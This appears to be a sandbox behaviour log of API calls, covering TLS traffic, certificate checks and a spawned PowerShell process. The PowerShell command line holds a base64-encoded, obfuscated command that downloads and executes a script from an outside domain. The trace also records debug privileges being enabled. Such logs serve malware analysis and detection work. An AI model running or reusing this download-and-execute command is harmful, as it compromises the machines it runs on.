	[0789.343] FreeContextBuffer (in: pvContextBuffer=0x1b841510 | out: pvContextBuffer=0x1b841510) returned 0x0
	[0804.190] send (s=0x4a4, buf=0x2f436d8*, len=118, flags=0) returned 118
	[0804.191] recv (in: s=0x4a4, buf=0x2f436d8, len=5, flags=0 | out: buf=0x2f436d8*) returned 5
	[0804.282] recv (in: s=0x4a4, buf=0x2f436dd, len=93, flags=0 | out: buf=0x2f436dd*) returned 93
	[0804.283] InitializeSecurityContextW (in: phCredential=0x1c86d320, phContext=0x1c86d5d0, pTargetName=0x2f358e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f439e8, Reserved2=0x0, phNewContext=0x1c86d310, pOutput=0x2f43a08, pfContextAttr=0x1c86d308, ptsExpiry=0x1c86d300 | out: phNewContext=0x1c86d310, pOutput=0x2f43a08, pfContextAttr=0x1c86d308, ptsExpiry=0x1c86d300) returned 0x90312
	[0804.294] recv (in: s=0x4a4, buf=0x2f43af8, len=5, flags=0 | out: buf=0x2f43af8*) returned 5
	[0804.294] recv (in: s=0x4a4, buf=0x2f43b1d, len=2556, flags=0 | out: buf=0x2f43b1d*) returned 2556
	[0804.294] InitializeSecurityContextW (in: phCredential=0x1c86d250, phContext=0x1c86d500, pTargetName=0x2f358e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f445f0, Reserved2=0x0, phNewContext=0x1c86d240, pOutput=0x2f44610, pfContextAttr=0x1c86d238, ptsExpiry=0x1c86d230 | out: phNewContext=0x1c86d240, pOutput=0x2f44610, pfContextAttr=0x1c86d238, ptsExpiry=0x1c86d230) returned 0x90312
	[0804.318] recv (in: s=0x4a4, buf=0x2f44700, len=5, flags=0 | out: buf=0x2f44700*) returned 5
	[0804.318] recv (in: s=0x4a4, buf=0x2f44725, len=331, flags=0 | out: buf=0x2f44725*) returned 331
	[0804.318] InitializeSecurityContextW (in: phCredential=0x1c86d180, phContext=0x1c86d430, pTargetName=0x2f358e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f44940, Reserved2=0x0, phNewContext=0x1c86d170, pOutput=0x2f44960, pfContextAttr=0x1c86d168, ptsExpiry=0x1c86d160 | out: phNewContext=0x1c86d170, pOutput=0x2f44960, pfContextAttr=0x1c86d168, ptsExpiry=0x1c86d160) returned 0x90312
	[0804.321] recv (in: s=0x4a4, buf=0x2f44a50, len=5, flags=0 | out: buf=0x2f44a50*) returned 5
	[0804.321] recv (in: s=0x4a4, buf=0x2f44a75, len=4, flags=0 | out: buf=0x2f44a75*) returned 4
	[0804.321] InitializeSecurityContextW (in: phCredential=0x1c86d0b0, phContext=0x1c86d360, pTargetName=0x2f358e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f44b50, Reserved2=0x0, phNewContext=0x1c86d0a0, pOutput=0x2f44b70, pfContextAttr=0x1c86d098, ptsExpiry=0x1c86d090 | out: phNewContext=0x1c86d0a0, pOutput=0x2f44b70, pfContextAttr=0x1c86d098, ptsExpiry=0x1c86d090) returned 0x90312
	[0804.350] FreeContextBuffer (in: pvContextBuffer=0x1b83ed40 | out: pvContextBuffer=0x1b83ed40) returned 0x0
	[0804.350] send (s=0x4a4, buf=0x2f44c40*, len=134, flags=0) returned 134
	[0804.350] recv (in: s=0x4a4, buf=0x2f44c40, len=5, flags=0 | out: buf=0x2f44c40*) returned 5
	[0804.434] recv (in: s=0x4a4, buf=0x2f44c45, len=1, flags=0 | out: buf=0x2f44c45*) returned 1
	[0804.434] InitializeSecurityContextW (in: phCredential=0x1c86cfe0, phContext=0x1c86d290, pTargetName=0x2f358e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f44db8, Reserved2=0x0, phNewContext=0x1c86cfd0, pOutput=0x2f44dd8, pfContextAttr=0x1c86cfc8, ptsExpiry=0x1c86cfc0 | out: phNewContext=0x1c86cfd0, pOutput=0x2f44dd8, pfContextAttr=0x1c86cfc8, ptsExpiry=0x1c86cfc0) returned 0x90312
	[0804.435] recv (in: s=0x4a4, buf=0x2f44ec8, len=5, flags=0 | out: buf=0x2f44ec8*) returned 5
	[0804.435] recv (in: s=0x4a4, buf=0x2f44eed, len=48, flags=0 | out: buf=0x2f44eed*) returned 48
	[0804.435] InitializeSecurityContextW (in: phCredential=0x1c86cf10, phContext=0x1c86d1c0, pTargetName=0x2f358e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2f44ff0, Reserved2=0x0, phNewContext=0x1c86cf00, pOutput=0x2f45010, pfContextAttr=0x1c86cef8, ptsExpiry=0x1c86cef0 | out: phNewContext=0x1c86cf00, pOutput=0x2f45010, pfContextAttr=0x1c86cef8, ptsExpiry=0x1c86cef0) returned 0x0
	[0805.207] QueryContextAttributesW (in: phContext=0x1c86d170, ulAttribute=0x4, pBuffer=0x2f45128 | out: pBuffer=0x2f45128) returned 0x0
	[0806.973] QueryContextAttributesW (in: phContext=0x1c86d170, ulAttribute=0x5a, pBuffer=0x2f451a8 | out: pBuffer=0x2f451a8) returned 0x0
	[0806.983] QueryContextAttributesW (in: phContext=0x1c86d020, ulAttribute=0x53, pBuffer=0x2f454f8 | out: pBuffer=0x2f454f8) returned 0x0
	[0811.418] CertDuplicateCRLContext (pCrlContext=0x1b83bbc0) returned 0x1b83bbc0
	[0811.422] CertDuplicateStore (hCertStore=0x1b861420) returned 0x1b861420
	[0811.423] CertEnumCertificatesInStore (hCertStore=0x1b861420, pPrevCertContext=0x0) returned 0x1b83bc40
	[0811.423] CertDuplicateCRLContext (pCrlContext=0x1b83bc40) returned 0x1b83bc40
	[0811.424] CertEnumCertificatesInStore (hCertStore=0x1b861420, pPrevCertContext=0x1b83bc40) returned 0x1b83bbc0
	[0811.424] CertDuplicateCRLContext (pCrlContext=0x1b83bbc0) returned 0x1b83bbc0
	[0811.424] CertEnumCertificatesInStore (hCertStore=0x1b861420, pPrevCertContext=0x1b83bbc0) returned 0x0
	[0811.424] CertCloseStore (hCertStore=0x1b861420, dwFlags=0x0) returned 1
	[0811.424] CertFreeCRLContext (pCrlContext=0x1b83bbc0) returned 1
	[0812.875] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x1b8614f0
	[0812.876] CertAddCRLLinkToStore (in: hCertStore=0x1b8614f0, pCrlContext=0x1b83bc40, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0814.310] CertAddCRLLinkToStore (in: hCertStore=0x1b8614f0, pCrlContext=0x1b83bbc0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0827.312] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b83bbc0, pTime=0x1c86d028, hAdditionalStore=0x1b8614f0, pChainPara=0x1c86d030, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c86d020 | out: ppChainContext=0x1c86d020) returned 1
	[0851.357] CertDuplicateCertificateChain (pChainContext=0x1ce3b6c0) returned 0x1ce3b6c0
	[0851.358] CertDuplicateCRLContext (pCrlContext=0x1b83bbc0) returned 0x1b83bbc0
	[0851.359] CertDuplicateCRLContext (pCrlContext=0x1ce84180) returned 0x1ce84180
	[0851.359] CertDuplicateCRLContext (pCrlContext=0x1ce84200) returned 0x1ce84200
	[0851.359] CertFreeCertificateChain (pChainContext=0x1ce3b6c0) 
	[0851.360] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1ce3b6c0, pPolicyPara=0x1c86d1a8, pPolicyStatus=0x1c86d188 | out: pPolicyStatus=0x1c86d188) returned 1
	[0851.361] SetLastError (dwErrCode=0x0) 
	[0851.366] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1ce3b6c0, pPolicyPara=0x1c86d280, pPolicyStatus=0x1c86d268 | out: pPolicyStatus=0x1c86d268) returned 1
	[0857.417] CertFreeCertificateChain (pChainContext=0x1ce3b6c0) 
	[0857.418] CertFreeCRLContext (pCrlContext=0x1b83bbc0) returned 1
	[0858.458] EncryptMessage (in: phContext=0x1c86d830, fQOP=0x0, pMessage=0x2f47da0, MessageSeqNo=0x0 | out: pMessage=0x2f47da0) returned 0x0
	[0858.458] send (s=0x4a4, buf=0x2f47ae0*, len=117, flags=0) returned 117
	[0859.820] setsockopt (s=0x4a4, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0
	[0859.820] recv (in: s=0x4a4, buf=0x2f47f48, len=5, flags=0 | out: buf=0x2f47f48) returned -1
	[0859.821] WSAEventSelect (s=0x4a4, hEventObject=0x0, lNetworkEvents=0) returned 0
	[0859.821] CoTaskMemAlloc (cb=0x204) returned 0x2097b0
	[0859.821] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2745, dwLanguageId=0x0, lpBuffer=0x2097b0, nSize=0x101, Arguments=0x0 | out: lpBuffer="An established connection was aborted by the software in your host machine.\r\n") returned 0x4d
	[0859.821] CoTaskMemFree (pv=0x2097b0) 
	[0917.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c869280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0917.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8691d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0917.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8691d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0917.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8691d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.764] CryptAcquireContextA (in: phProv=0x1c867e48, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x1c867e48*=0x1b80ef40) returned 1
	[0925.293] CoTaskMemAlloc (cb=0x104) returned 0x254560
	[0925.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x254560, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0925.294] CoTaskMemFree (pv=0x254560) 

Thread:
	id = 1498
	os_tid = 0x1cf0


Thread:
	id = 1509
	os_tid = 0x1d54


Thread:
	id = 1533
	os_tid = 0x2020

	[0752.291] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0752.298] ResetEvent (hEvent=0x370) returned 1
	[0858.645] GetSystemInfo (in: lpSystemInfo=0x1cb9dc90 | out: lpSystemInfo=0x1cb9dc90*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0905.407] CoUninitialize () 

Thread:
	id = 1765
	os_tid = 0x2354


Thread:
	id = 1776
	os_tid = 0xae0


Thread:
	id = 1853
	os_tid = 0x2488

	[0862.401] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0891.548] QueryContextAttributesW (in: phContext=0x1d14ef90, ulAttribute=0x1a, pBuffer=0x1d14f110 | out: pBuffer=0x1d14f110) returned 0x0
	[0905.408] DeleteSecurityContext (phContext=0x1d14e760) returned 0x0
	[0906.754] shutdown (s=0x4a4, how=2) returned 0
	[0906.754] setsockopt (s=0x4a4, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0906.755] closesocket (s=0x4a4) returned 0

Process:
	id = "68"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x20e4b000"
	os_pid = "0xf98"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 321
	os_tid = 0xf9c

	[0522.594] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0525.593] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0525.593] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0525.593] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0525.593] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0535.016] GetVersionExW (in: lpVersionInformation=0x24db80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24db80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0535.018] GetVersionExW (in: lpVersionInformation=0x24db80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24db80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0535.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0535.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0535.032] GetVersionExW (in: lpVersionInformation=0x24d8f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24d8f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0535.033] SetErrorMode (uMode=0x1) returned 0x1
	[0535.034] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24da50 | out: lpFileInformation=0x24da50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0535.035] SetErrorMode (uMode=0x1) returned 0x1
	[0535.038] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24dcc0 | out: lpdwHandle=0x24dcc0) returned 0x94c
	[0535.040] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cb72d8 | out: lpData=0x2cb72d8) returned 1
	[0535.043] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dc38, puLen=0x24dc30 | out: lplpBuffer=0x24dc38*=0x2cb7374, puLen=0x24dc30) returned 1
	[0535.045] lstrlenW (lpString="䅁") returned 1
	[0536.038] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24dba8, puLen=0x24dba0 | out: lplpBuffer=0x24dba8*=0x2cb7450, puLen=0x24dba0) returned 1
	[0536.039] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0536.041] CoTaskMemAlloc (cb=0x2e) returned 0x4c7b80
	[0536.041] lstrcpyW (in: lpString1=0x4c7b80, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0536.042] CoTaskMemFree (pv=0x4c7b80) 
	[0536.042] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24dba8, puLen=0x24dba0 | out: lplpBuffer=0x24dba8*=0x2cb74a4, puLen=0x24dba0) returned 1
	[0536.042] lstrlenW (lpString="System.Management.Automation") returned 28
	[0536.042] CoTaskMemAlloc (cb=0x3c) returned 0x409860
	[0536.042] lstrcpyW (in: lpString1=0x409860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0536.042] CoTaskMemFree (pv=0x409860) 
	[0536.042] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24dba8, puLen=0x24dba0 | out: lplpBuffer=0x24dba8*=0x2cb7500, puLen=0x24dba0) returned 1
	[0536.042] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0536.042] CoTaskMemAlloc (cb=0x20) returned 0x4c80f0
	[0536.042] lstrcpyW (in: lpString1=0x4c80f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0536.042] CoTaskMemFree (pv=0x4c80f0) 
	[0536.042] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24dba8, puLen=0x24dba0 | out: lplpBuffer=0x24dba8*=0x2cb7540, puLen=0x24dba0) returned 1
	[0536.042] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0536.042] CoTaskMemAlloc (cb=0x44) returned 0x409860
	[0536.042] lstrcpyW (in: lpString1=0x409860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0536.042] CoTaskMemFree (pv=0x409860) 
	[0536.042] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24dba8, puLen=0x24dba0 | out: lplpBuffer=0x24dba8*=0x2cb75a8, puLen=0x24dba0) returned 1
	[0536.042] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0536.042] CoTaskMemAlloc (cb=0x76) returned 0x46f120
	[0536.042] lstrcpyW (in: lpString1=0x46f120, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0536.042] CoTaskMemFree (pv=0x46f120) 
	[0536.042] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24dba8, puLen=0x24dba0 | out: lplpBuffer=0x24dba8*=0x2cb7644, puLen=0x24dba0) returned 1
	[0536.042] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0536.043] CoTaskMemAlloc (cb=0x44) returned 0x409860
	[0536.043] lstrcpyW (in: lpString1=0x409860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0536.043] CoTaskMemFree (pv=0x409860) 
	[0536.043] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24dba8, puLen=0x24dba0 | out: lplpBuffer=0x24dba8*=0x2cb76a8, puLen=0x24dba0) returned 1
	[0536.043] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0536.043] CoTaskMemAlloc (cb=0x58) returned 0x497e60
	[0536.043] lstrcpyW (in: lpString1=0x497e60, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0536.043] CoTaskMemFree (pv=0x497e60) 
	[0536.043] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24dba8, puLen=0x24dba0 | out: lplpBuffer=0x24dba8*=0x2cb7724, puLen=0x24dba0) returned 1
	[0536.043] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0536.043] CoTaskMemAlloc (cb=0x20) returned 0x4c80f0
	[0536.043] lstrcpyW (in: lpString1=0x4c80f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0536.043] CoTaskMemFree (pv=0x4c80f0) 
	[0536.043] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24dba8, puLen=0x24dba0 | out: lplpBuffer=0x24dba8*=0x2cb73cc, puLen=0x24dba0) returned 1
	[0536.043] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0536.043] CoTaskMemAlloc (cb=0x66) returned 0x44c1a0
	[0536.043] lstrcpyW (in: lpString1=0x44c1a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0536.043] CoTaskMemFree (pv=0x44c1a0) 
	[0536.043] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24dba8, puLen=0x24dba0 | out: lplpBuffer=0x24dba8*=0x0, puLen=0x24dba0) returned 0
	[0536.043] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24dba8, puLen=0x24dba0 | out: lplpBuffer=0x24dba8*=0x0, puLen=0x24dba0) returned 0
	[0536.043] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24dba8, puLen=0x24dba0 | out: lplpBuffer=0x24dba8*=0x0, puLen=0x24dba0) returned 0
	[0536.043] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24db78, puLen=0x24db70 | out: lplpBuffer=0x24db78*=0x2cb7374, puLen=0x24db70) returned 1
	[0536.044] CoTaskMemAlloc (cb=0x204) returned 0x471b30
	[0536.044] VerLanguageNameW (in: wLang=0x0, szLang=0x471b30, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0536.045] CoTaskMemFree (pv=0x471b30) 
	[0536.046] VerQueryValueW (in: pBlock=0x2cb72d8, lpSubBlock="\\", lplpBuffer=0x24dbc8, puLen=0x24dbc0 | out: lplpBuffer=0x24dbc8*=0x2cb7300, puLen=0x24dbc0) returned 1
	[0536.051] GetCurrentProcessId () returned 0xf98
	[0536.066] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24caf0 | out: lpLuid=0x24caf0*(LowPart=0x14, HighPart=0)) returned 1
	[0537.041] GetCurrentProcess () returned 0xffffffffffffffff
	[0537.042] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x24cb10 | out: TokenHandle=0x24cb10*=0x2e4) returned 1
	[0537.043] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x2cbab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0537.044] CloseHandle (hObject=0x2e4) returned 1
	[0537.048] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf98) returned 0x2e4
	[0537.057] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2cbabb8, cb=0x200, lpcbNeeded=0x24db28 | out: lphModule=0x2cbabb8, lpcbNeeded=0x24db28) returned 1
	[0537.059] GetModuleInformation (in: hProcess=0x2e4, hModule=0x13f370000, lpmodinfo=0x2cbae28, cb=0x18 | out: lpmodinfo=0x2cbae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0537.060] CoTaskMemAlloc (cb=0x804) returned 0x4cfed0
	[0537.060] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x13f370000, lpBaseName=0x4cfed0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0537.060] CoTaskMemFree (pv=0x4cfed0) 
	[0537.061] CoTaskMemAlloc (cb=0x804) returned 0x4cfed0
	[0537.061] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x13f370000, lpFilename=0x4cfed0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0537.061] CoTaskMemFree (pv=0x4cfed0) 
	[0537.062] CloseHandle (hObject=0x2e4) returned 1
	[0537.069] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf98) returned 0x2e4
	[0537.070] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x24dc58 | out: lpExitCode=0x24dc58*=0x103) returned 1
	[0537.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cbb088, Length=0x20000, ResultLength=0x24dc20 | out: SystemInformation=0x12cbb088, ResultLength=0x24dc20*=0x320d0) returned 0xc0000004
